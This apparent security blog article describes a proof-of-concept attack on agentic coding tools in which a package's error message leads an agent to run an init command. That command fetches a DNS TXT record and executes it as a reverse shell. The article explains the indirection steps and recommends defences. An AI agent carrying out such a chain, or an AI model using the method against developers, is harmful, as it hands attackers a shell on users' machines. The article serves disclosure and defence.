When the AI Fixes the Bug — and Opens the Backdoor
When the AI Fixes the Bug — and Opens the Backdoor
A new class of supply chain attack exploits agentic coding tools to deliver payloads that no scanner will ever find
There is no malicious code in the repository. The AI never decides to open a shell. The attack works anyway.
Researchers at Mozilla's Zero Day Investigative Network (0DIN) have demonstrated a proof-of-concept attack that targets developers using agentic coding tools — AI systems like Claude Code that can autonomously clone repositories, install dependencies, and run setup commands on your behalf. The attack delivers a reverse shell to the developer's machine with, as the researchers put it, "no exploit code, no warning, no suspicious command anyone had to approve."
It is not the most technically complex attack ever devised. It is, however, one of the most cleverly designed — because its primary feature is invisibility.
Three harmless pieces, one dangerous machine
The attack is built from three components. Individually, none of them raises a flag. Together, they form a complete exploitation chain.
The first component is a clean GitHub repository. It looks like any other open-source project: a README with setup instructions, a requirements.txt, some source files. A human reviewer would find nothing wrong. A static analysis scanner would return clean. The repository is, in fact, entirely clean — and that is precisely the point.
The standard setup instructions direct the user to install a Python package and then run an initialisation command: pip3 install -r requirements.txt, followed by python3 -m axiom init.
The second component is the Python package itself, hosted on PyPI. It, too, contains no malicious code. But it is engineered with a specific behaviour: it refuses to run until initialised, and it generates an error telling the user exactly what to do about it. Run python3 -m axiom init, it says. This pattern — a package that requires a one-time setup step before it becomes functional — is entirely normal. Every developer has seen it.
The third component is a DNS TXT record controlled by the attacker.
When an agentic coding tool encounters the package's error message, it does what it is designed to do: it tries to fix the problem. It reads the error, identifies the suggested remedy, and runs python3 -m axiom init. The init module, in turn, calls a shell script. The shell script performs a DNS TXT record lookup on a domain the attacker controls. DNS TXT records are a legitimate mechanism for storing configuration values — many real tools use them. The script retrieves the value and executes it as a command.
The value stored in the TXT record is the reverse shell payload.
The attacker now has an interactive shell running as the developer's own user.
The geometry of indirection
What makes this attack genuinely instructive — beyond its immediate danger — is the architecture of its deniability.
At no point did the AI agent evaluate anything suspicious. It evaluated an error message that looked like a standard setup issue. It ran a command that looked like a standard initialisation step. It never saw the shell script's network call. It never saw the DNS query. It never saw the payload.
The 0DIN researchers describe this with precision: "Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated: an error message it trusted, a script that fetched a value, and a DNS record it never saw."
This is the architecture of the attack — not a single dramatic exploit, but a chain of individually unremarkable decisions, each delegated to a different layer, none of which crosses a threshold that any current detection system monitors.
Conventional supply chain attacks — dependency confusion, typosquatting, malicious npm packages — work by embedding harmful code somewhere in the delivery chain. Defenders have built tooling to find that code: scanners, lockfile auditing, provenance verification. This attack bypasses all of it by ensuring the harmful content never enters the delivery chain at all. The payload lives in a DNS record that is only fetched at runtime, on the victim's machine, after every check has already passed.
The agentic amplifier
Agentic coding tools do not just introduce a new attack surface. They accelerate the execution of attacks that previously required human interaction.
In a traditional scenario, a developer who clones a malicious repository and follows its setup instructions is still making a series of deliberate choices. Each step is a moment where they might pause, notice something odd, or decide to investigate. The friction of manual execution is, imperfectly but genuinely, a defence.
Agentic tools remove that friction. They are designed to do so — their value proposition is exactly that a developer can describe what they want and delegate the mechanics. An agent that encounters a setup error during repository initialisation does not pause to reflect. It fixes the error. That is its job.
The researchers note that the agent "automates the entire attack chain, including a step that mimics a common user error." The mimicry is important: because the error message looks authentic, because the fix looks routine, and because the agent has been trained to handle routine setup issues helpfully, no part of the system trips an alarm. The attack exploits the agent's competence, not its ignorance.
Distribution: the missing piece that already exists
The 0DIN researchers describe their work as a proof of concept — the attack has not been observed in active exploitation. But they are explicit about what this means, and what it does not.
The technical components are all available. The distribution vectors are already in use for other malicious purposes. Job postings that ask candidates to run a code sample. Developer tutorials on YouTube with a companion repository in the description. Blog posts demonstrating a new framework. Direct messages in developer communities recommending a project. All of these exist today, and all of them could carry a repository built on this pattern without the creator needing to do anything especially sophisticated.
The only genuinely new element is the targeting: specifically choosing a repository that an agentic tool is likely to be used to set up, and designing the error message to trigger the agent's recovery behaviour rather than a human's attention.
What good defence looks like
The 0DIN researchers identify the most impactful single mitigation at the tool level: AI agents should disclose the full execution chain of setup commands, including scripts and code fetched dynamically at runtime. Currently, an agent that runs python3 -m axiom init presents that as the action it took. It does not surface what that command subsequently did — what scripts it called, what network requests it made, what it executed. Making that chain visible to the developer before or during execution would break the indirection that makes the attack work.
Alongside that, the researchers recommend that agents seek explicit confirmation before running any command that retrieves and executes content from a remote source — DNS, HTTP, or otherwise. This is a meaningful friction point precisely because it is placed at the moment the chain becomes dangerous, rather than at an earlier stage where everything still looks clean.
For developers and security teams, the practical guidance is more immediate. Running unfamiliar repositories in an ephemeral environment — a VM, a container, a disposable CI runner — before executing them on a development machine limits the blast radius even if the attack succeeds. Monitoring outbound DNS TXT queries from developer workstations can surface this class of attack in post-incident analysis. And, critically, security teams should update their threat models: static scanning of cloned repositories will not detect this. Treating a clean scan as a security guarantee is now more dangerous than it used to be.
The deeper lesson
Supply chain security has, for the past several years, focused heavily on what is in the code — on detecting and preventing the introduction of malicious content into packages, registries, and repositories. That work is valuable and necessary. But this attack is a reminder that the question "is there malicious code here?" is not the same question as "is this safe to run?"
When execution is delegated to an autonomous agent, the attack surface expands to include everything the agent will do in response to the code — its error handling, its recovery behaviour, its helpfulness. An agent that encounters a confusing error message and resolves it without surfacing the full chain of what it ran has, in this scenario, done exactly what it was designed to do. The design is the vulnerability.
That does not make agentic tools net-harmful. It means that as they become standard parts of the development workflow, the security assumptions we bring to that workflow need to evolve with them. The tools are new. The threats they enable, and the defences they require, are new too.
Comments
Post a Comment